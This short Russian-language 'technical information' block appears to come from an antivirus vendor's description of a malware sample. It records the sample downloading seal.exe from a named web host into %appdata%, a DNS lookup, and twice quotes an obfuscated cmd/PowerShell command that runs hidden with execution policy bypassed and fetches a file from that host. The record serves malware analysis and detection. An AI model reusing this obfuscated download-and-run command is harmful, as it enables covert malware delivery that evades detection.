Техническая информация
- http://kesigcse.org/uploadedfiles/seal.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwE^R^s^hEll^.^exe^ ^-Exe^CUT^IoNp^oli^cy BYpa^sS -noP^r^O^F^ILe -^W^i^ndow^ST^YLe ^hIDDen^ ^(^NeW-o^BjECt sYSTE^M^.NeT.^WEBcli^En^T).^Do^W^NloA^D^FILE^('http://kesigcse.org/Upl...
- DNS ASK ke###cse.org
- '<SYSTEM32>\cmd.exe' /C "P^OwE^R^s^hEll^.^exe^ ^-Exe^CUT^IoNp^oli^cy BYpa^sS -noP^r^O^F^ILe -^W^i^ndow^ST^YLe ^hIDDen^ ^(^NeW-o^BjECt sYSTE^M^.NeT.^WEBcli^En^T).^Do^W^NloA^D^FILE^('http://kesigcse.org/Upl...' (со скрытым окном)